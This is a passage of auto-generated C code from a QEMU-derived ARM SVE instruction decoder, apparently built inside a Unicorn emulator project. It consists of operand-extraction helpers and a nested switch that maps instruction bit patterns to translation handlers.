a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_rpri_load_msz(DisasContext *ctx, arg_rpri_load *a, uint32_t insn) { a->imm = sextract32(insn, 16, 4); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->dtype = msz_dtype(ctx, extract32(insn, 23, 2)); } static void disas_sve_extract_rpri_scatter_store(DisasContext *ctx, arg_rpri_scatter_store *a, uint32_t insn) { a->msz = extract32(insn, 23, 2); a->imm = extract32(insn, 16, 5); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_rpri_store_msz(DisasContext *ctx, arg_rpri_store *a, uint32_t insn) { a->msz = extract32(insn, 23, 2); a->imm = sextract32(insn, 16, 4); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_rprr_g_load_sc(DisasContext *ctx, arg_rprr_gather_load *a, uint32_t insn) { a->scale = extract32(insn, 21, 1); a->rm = extract32(insn, 16, 5); a->ff = extract32(insn, 13, 1); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->xs = 2; } static void disas_sve_extract_rprr_g_load_u(DisasContext *ctx, arg_rprr_gather_load *a, uint32_t insn) { a->rm = extract32(insn, 16, 5); a->u = extract32(insn, 14, 1); a->ff = extract32(insn, 13, 1); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->xs = 2; } static void disas_sve_extract_rprr_g_load_u_sc(DisasContext *ctx, arg_rprr_gather_load *a, uint32_t insn) { a->scale = extract32(insn, 21, 1); a->rm = extract32(insn, 16, 5); a->u = extract32(insn, 14, 1); a->ff = extract32(insn, 13, 1); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->xs = 2; } static void disas_sve_extract_rprr_g_load_xs_sc(DisasContext *ctx, arg_rprr_gather_load *a, uint32_t insn) { a->xs = extract32(insn, 22, 1); a->scale = extract32(insn, 21, 1); a->rm = extract32(insn, 16, 5); a->ff = extract32(insn, 13, 1); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_rprr_g_load_xs_u(DisasContext *ctx, arg_rprr_gather_load *a, uint32_t insn) { a->xs = extract32(insn, 22, 1); a->rm = extract32(insn, 16, 5); a->u = extract32(insn, 14, 1); a->ff = extract32(insn, 13, 1); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_rprr_g_load_xs_u_sc(DisasContext *ctx, arg_rprr_gather_load *a, uint32_t insn) { a->xs = extract32(insn, 22, 1); a->scale = extract32(insn, 21, 1); a->rm = extract32(insn, 16, 5); a->u = extract32(insn, 14, 1); a->ff = extract32(insn, 13, 1); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_rprr_load_dt(DisasContext *ctx, arg_rprr_load *a, uint32_t insn) { a->dtype = extract32(insn, 21, 4); a->rm = extract32(insn, 16, 5); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_rprr_load_msz(DisasContext *ctx, arg_rprr_load *a, uint32_t insn) { a->rm = extract32(insn, 16, 5); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->dtype = msz_dtype(ctx, extract32(insn, 23, 2)); } static void disas_sve_extract_rprr_scatter_store(DisasContext *ctx, arg_rprr_scatter_store *a, uint32_t insn) { a->msz = extract32(insn, 23, 2); a->rm = extract32(insn, 16, 5); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_rprr_store(DisasContext *ctx, arg_rprr_store *a, uint32_t insn) { a->rm = extract32(insn, 16, 5); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_rprr_store_esz_n0(DisasContext *ctx, arg_rprr_store *a, uint32_t insn) { a->esz = extract32(insn, 21, 2); a->rm = extract32(insn, 16, 5); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->nreg = 0; } bool disas_sve(DisasContext *ctx, uint32_t insn) { union { arg_disas_sve25 f_disas_sve25; arg_disas_sve26 f_disas_sve26; arg_disas_sve27 f_disas_sve27; arg_disas_sve28 f_disas_sve28; arg_disas_sve29 f_disas_sve29; arg_disas_sve30 f_disas_sve30; arg_disas_sve31 f_disas_sve31; arg_disas_sve32 f_disas_sve32; arg_disas_sve33 f_disas_sve33; arg_disas_sve34 f_disas_sve34; arg_disas_sve35 f_disas_sve35; arg_disas_sve36 f_disas_sve36; arg_disas_sve37 f_disas_sve37; arg_disas_sve38 f_disas_sve38; arg_disas_sve39 f_disas_sve39; arg_disas_sve40 f_disas_sve40; arg_disas_sve41 f_disas_sve41; arg_disas_sve42 f_disas_sve42; arg_disas_sve43 f_disas_sve43; arg_disas_sve44 f_disas_sve44; arg_disas_sve45 f_disas_sve45; arg_disas_sve46 f_disas_sve46; arg_disas_sve47 f_disas_sve47; arg_incdec2_cnt f_incdec2_cnt; arg_incdec2_pred f_incdec2_pred; arg_incdec_cnt f_incdec_cnt; arg_incdec_pred f_incdec_pred; arg_ptrue f_ptrue; arg_rpr_esz f_rpr_esz; arg_rpr_s f_rpr_s; arg_rpri_esz f_rpri_esz; arg_rpri_gather_load f_rpri_gather_load; arg_rpri_load f_rpri_load; arg_rpri_scatter_store f_rpri_scatter_store; arg_rpri_store f_rpri_store; arg_rprr_esz f_rprr_esz; arg_rprr_gather_load f_rprr_gather_load; arg_rprr_load f_rprr_load; arg_rprr_s f_rprr_s; arg_rprr_scatter_store f_rprr_scatter_store; arg_rprr_store f_rprr_store; arg_rprrr_esz f_rprrr_esz; arg_rr_dbm f_rr_dbm; arg_rr_esz f_rr_esz; arg_rri f_rri; arg_rri_esz f_rri_esz; arg_rrr_esz f_rrr_esz; arg_rrri f_rrri; } u; switch ((insn >> 25) & 0x7f) { case 0x2: /* 0000010. ........ ........ ........ */ switch (insn & 0x01200000) { case 0x00000000: /* 00000100 ..0..... ........ ........ */ switch ((insn >> 13) & 0x7) { case 0x0: /* 00000100 ..0..... 000..... ........ */ switch ((insn >> 16) & 0x1f) { case 0x0: /* 00000100 ..000000 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:245 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_ADD_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x1: /* 00000100 ..000001 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:246 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_SUB_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x3: /* 00000100 ..000011 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:247 */ disas_sve_extract_rdm_pg_rn(ctx, &u.f_rprr_esz, insn); if (trans_SUB_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x8: /* 00000100 ..001000 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:250 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_SMAX_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x9: /* 00000100 ..001001 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:251 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_UMAX_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0xa: /* 00000100 ..001010 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:252 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_SMIN_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0xb: /* 00000100 ..001011 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:253 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_UMIN_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0xc: /* 00000100 ..001100 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:254 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_SABD_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0xd: /* 00000100 ..001101 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:255 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_UABD_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x10: /* 00000100 ..010000 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:258 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_MUL_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x12: /* 00000100 ..010010 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:259 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_SMULH_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x13: /* 00000100 ..010011 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:260 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_UMULH_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x14: /* 00000100 ..010100 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:262 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_SDIV_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x15: /* 00000100 ..010101 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:263 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_UDIV_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x16: /* 00000100 ..010110 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:264 */ disas_sve_extract_rdm_pg_rn(ctx, &u.f_rprr_esz, insn); if (trans_SDIV_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x17: /* 00000100 ..010111 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:265 */ disas_sve_extract_rdm_pg_rn(ctx, &u.f_rprr_esz, insn); if (trans_UDIV_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x18: /* 00000100 ..011000 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:239 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_ORR_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x19: /* 00000100 ..011001 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:240 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_EOR_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x1a: /* 00000100 ..011010 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:241 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_AND_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x1b: /* 00000100 ..011011 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:242 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_BIC_zpzz(ctx, &u.f_rprr_esz)) return true; return false; } return false; case 0x1: /* 00000100 ..0..... 001..... ........ */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); switch ((insn >> 16) & 0x1f) { case 0x0: /* 00000100 ..000000 001..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:281 */ if (trans_SADDV(ctx, &u.f_rpr_esz)) return true; return false; case 0x1: /* 00000100 ..000001 001..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:280 */ if (trans_UADDV(ctx, &u.f_rpr_esz)) return true; return false; case 0x8: /* 00000100 ..001000 001..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:284 */ if (trans_SMAXV(ctx, &u.f_rpr_esz)) return true; return false; case 0x9: /* 00000100 ..001001 001..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:285 */ if (trans_UMAXV(ctx, &u.f_rpr_esz)) return true; return false; case 0xa: /* 00000100 ..001010 001..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:286 */ if (trans_SMINV(ctx, &u.f_rpr_esz)) return true; return false; case 0xb: /* 00000100 ..001011 001..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:287 */ if (trans_UMINV(ctx, &u.f_rpr_esz)) return true; return false; case 0x10: /* 00000100 ..010000 001..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:275 */ if (trans_MOVPRFX_z(ctx, &u.f_rpr_esz)) return true; return false; case 0x11: /* 00000100 ..010001 001..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:276 */ if (trans_MOVPRFX_m(ctx, &u.f_rpr_esz)) return true; return false; case 0x18: /* 00000100 ..011000 001..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:270 */ if (trans_ORV(ctx, &u.f_rpr_esz)) return true; return false; case 0x19: /* 00000100 ..011001 001..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:271 */ if (trans_EORV(ctx, &u.f_rpr_esz)) return true; return false; case 0x1a: /* 00000100 ..011010 001..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:272 */ if (trans_ANDV(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x2: /* 00000100 ..0..... 010..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:352 */ disas_sve_extract_rda_pg_rn_rm(ctx, &u.f_rprrr_esz, insn); if (trans_MLA(ctx, &u.f_rprrr_esz)) return true; return false; case 0x3: /* 00000100 ..0..... 011..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:353 */ disas_sve_extract_rda_pg_rn_rm(ctx, &u.f_rprrr_esz, insn); if (trans_MLS(ctx, &u.f_rprrr_esz)) return true; return false; case 0x4: /* 00000100 ..0..... 100..... ........ */ switch ((insn >> 16) & 0x1f) { case 0x0: /* 00000100 ..000000 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:292 */ disas_sve_extract_rdn_pg_tszimm(ctx, &u.f_rpri_esz, insn); u.f_rpri_esz.imm = tszimm_shr(ctx, deposit32(extract32(insn, 5, 5), 5, 27, extract32(insn, 22, 2))); if (trans_ASR_zpzi(ctx, &u.f_rpri_esz)) return true; return false; case 0x1: /* 00000100 ..000001 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:294 */ disas_sve_extract_rdn_pg_tszimm(ctx, &u.f_rpri_esz, insn); u.f_rpri_esz.imm = tszimm_shr(ctx, deposit32(extract32(insn, 5, 5), 5, 27, extract32(insn, 22, 2))); if (trans_LSR_zpzi(ctx, &u.f_rpri_esz)) return true; return false; case 0x3: /* 00000100 ..000011 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:296 */ disas_sve_extract_rdn_pg_tszimm(ctx, &u.f_rpri_esz, insn); u.f_rpri_esz.imm = tszimm_shl(ctx, deposit32(extract32(insn, 5, 5), 5, 27, extract32(insn, 22, 2))); if (trans_LSL_zpzi(ctx, &u.f_rpri_esz)) return true; return false; case 0x4: /* 00000100 ..000100 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:298 */ disas_sve_extract_rdn_pg_tszimm(ctx, &u.f_rpri_esz, insn); u.f_rpri_esz.imm = tszimm_shr(ctx, deposit32(extract32(insn, 5, 5), 5, 27, extract32(insn, 22, 2))); if (trans_ASRD(ctx, &u.f_rpri_esz)) return true; return false; case 0x10: /* 00000100 ..010000 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:302 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_ASR_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x11: /* 00000100 ..010001 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:303 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_LSR_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x13: /* 00000100 ..010011 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:304 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_LSL_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x14: /* 00000100 ..010100 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:305 */ disas_sve_extract_rdm_pg_rn(ctx, &u.f_rprr_esz, insn); if (trans_ASR_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x15: /* 00000100 ..010101 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:306 */ disas_sve_extract_rdm_pg_rn(ctx, &u.f_rprr_esz, insn); if (trans_LSR_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x17: /* 00000100 ..010111 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:307 */ disas_sve_extract_rdm_pg_rn(ctx, &u.f_rprr_esz, insn); if (trans_LSL_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x18: /* 00000100 ..011000 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:311 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_ASR_zpzw(ctx, &u.f_rprr_esz)) return true; return false; case 0x19: /* 00000100 ..011001 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:312 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_LSR_zpzw(ctx, &u.f_rprr_esz)) return true; return false; case 0x1b: /* 00000100 ..011011 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:313 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_LSL_zpzw(ctx, &u.f_rprr_esz)) return true; return false; } return false; case 0x5: /* 00000100 ..0..... 101..... ........ */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); switch ((insn >> 16) & 0x1f) { case 0x10: /* 00000100 ..010000 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:331 */ if (trans_SXTB(ctx, &u.f_rpr_esz)) return true; return false; case 0x11: /* 00000100 ..010001 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:332 */ if (trans_UXTB(ctx, &u.f_rpr_esz)) return true; return false; case 0x12: /* 00000100 ..010010 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:333 */ if (trans_SXTH(ctx, &u.f_rpr_esz)) return true; return false; case 0x13: /* 00000100 ..010011 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:334 */ if (trans_UXTH(ctx, &u.f_rpr_esz)) return true; return false; case 0x14: /* 00000100 ..010100 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:335 */ if (trans_SXTW(ctx, &u.f_rpr_esz)) return true; return false; case 0x15: /* 00000100 ..010101 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:336 */ if (trans_UXTW(ctx, &u.f_rpr_esz)) return true; return false; case 0x16: /* 00000100 ..010110 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:329 */ if (trans_ABS(ctx, &u.f_rpr_esz)) return true; return false; case 0x17: /* 00000100 ..010111 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:330 */ if (trans_NEG(ctx, &u.f_rpr_esz)) return true; return false; case 0x18: /* 00000100 ..011000 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:319 */ if (trans_CLS(ctx, &u.f_rpr_esz)) return true; return false; case 0x19: /* 00000100 ..011001 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:320 */ if (trans_CLZ(ctx, &u.f_rpr_esz)) return true; return false; case 0x1a: /* 00000100 ..011010 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:321 */ if (trans_CNT_zpz(ctx, &u.f_rpr_esz)) return true; return false; case 0x1b: /* 00000100 ..011011 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:322 */ if (trans_CNOT(ctx, &u.f_rpr_esz)) return true; return false; case 0x1c: /* 00000100 ..011100 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:324 */ if (trans_FABS(ctx, &u.f_rpr_esz)) return true; return false; case 0x1d: /* 00000100 ..011101 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:325 */ if (trans_FNEG(ctx, &u.f_rpr_esz)) return true; return false; case 0x1e: /* 00000100 ..011110 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:323 */ if (trans_NOT_zpz(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x6: /* 00000100 ..0..... 110..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:356 */ disas_sve_extract_rdn_pg_ra_rm(ctx, &u.f_rprrr_esz, insn); if (trans_MLA(ctx, &u.f_rprrr_esz)) return true; return false; case 0x7: /* 00000100 ..0..... 111..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:357 */ disas_sve_extract_rdn_pg_ra_rm(ctx, &u.f_rprrr_esz, insn); if (trans_MLS(ctx, &u.f_rprrr_esz)) return true; return false; } return false; case 0x00200000: /* 00000100 ..1..... ........ ........ */ switch ((insn >> 12) & 0xf) { case 0x0: /* 00000100 ..1..... 0000.... ........ */ disas_sve_extract_rd_rn_rm(ctx, &u.f_rrr_esz, insn); switch ((insn >> 10) & 0x3) { case 0x0: /* 00000100 ..1..... 000000.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:362 */ if (trans_ADD_zzz(ctx, &u.f_rrr_esz)) return true; return false; case 0x1: /* 00000100 ..1..... 000001.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:363 */ if (trans_SUB_zzz(ctx, &u.f_rrr_esz)) return true; return false; } return false; case 0x1: /* 00000100 ..1..... 0001.... ........ */ disas_sve_extract_rd_rn_rm(ctx, &u.f_rrr_esz, insn); switch ((insn >> 10) & 0x3) { case 0x0: /* 00000100 ..1..... 000100.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:364 */ if (trans_SQADD_zzz(ctx, &u.f_rrr_esz)) return true; return false; case 0x1: /* 00000100 ..1..... 000101.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:365 */ if (trans_UQADD_zzz(ctx, &u.f_rrr_esz)) return true; return false; case 0x2: /* 00000100 ..1..... 000110.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:366 */ if (trans_SQSUB_zzz(ctx, &u.f_rrr_esz)) return true; return false; case 0x3: /* 00000100 ..1..... 000111.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:367 */ if (trans_UQSUB_zzz(ctx, &u.f_rrr_esz)) return true; return false; } return false; case 0x3: /* 00000100 ..1..... 0011.... ........ */ disas_sve_extract_rd_rn_rm_e0(ctx, &u.f_rrr_esz, insn); switch (insn & 0x00c00c00) { case 0x00000000: /* 00000100 001..... 001100.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:372 */ if (trans_AND_zzz(ctx, &u.f_rrr_esz)) return true; return false; case 0x00400000: /* 00000100 011..... 001100.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:373 */ if (trans_ORR_zzz(ctx, &u.f_rrr_esz)) return true; return false; case 0x00800000: /* 00000100 101..... 001100.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:374 */ if (trans_EOR_zzz(ctx, &u.f_rrr_esz)) return true; return false; case 0x00c00000: /* 00000100 111..... 001100.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:375 */ if (trans_BIC_zzz(ctx, &u.f_rrr_esz)) return true; return false; } return false; case 0x4: /* 00000100 ..1..... 0100.... ........ */ switch ((insn >> 10) & 0x3) { case 0x0: /* 00000100 ..1..... 010000.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:380 */ disas_sve_extract_disas_sve_Fmt_55(ctx, &u.f_disas_sve25, insn); if (trans_INDEX_ii(ctx, &u.f_disas_sve25)) return true; return false; case 0x1: /* 00000100 ..1..... 010001.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:386 */ disas_sve_extract_disas_sve_Fmt_57(ctx, &u.f_rri_esz, insn); if (trans_INDEX_ri(ctx, &u.f_rri_esz)) return true; return false; case 0x2: /* 00000100 ..1..... 010010.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:383 */ disas_sve_extract_disas_sve_Fmt_56(ctx, &u.f_disas_sve26, insn); if (trans_INDEX_ir(ctx, 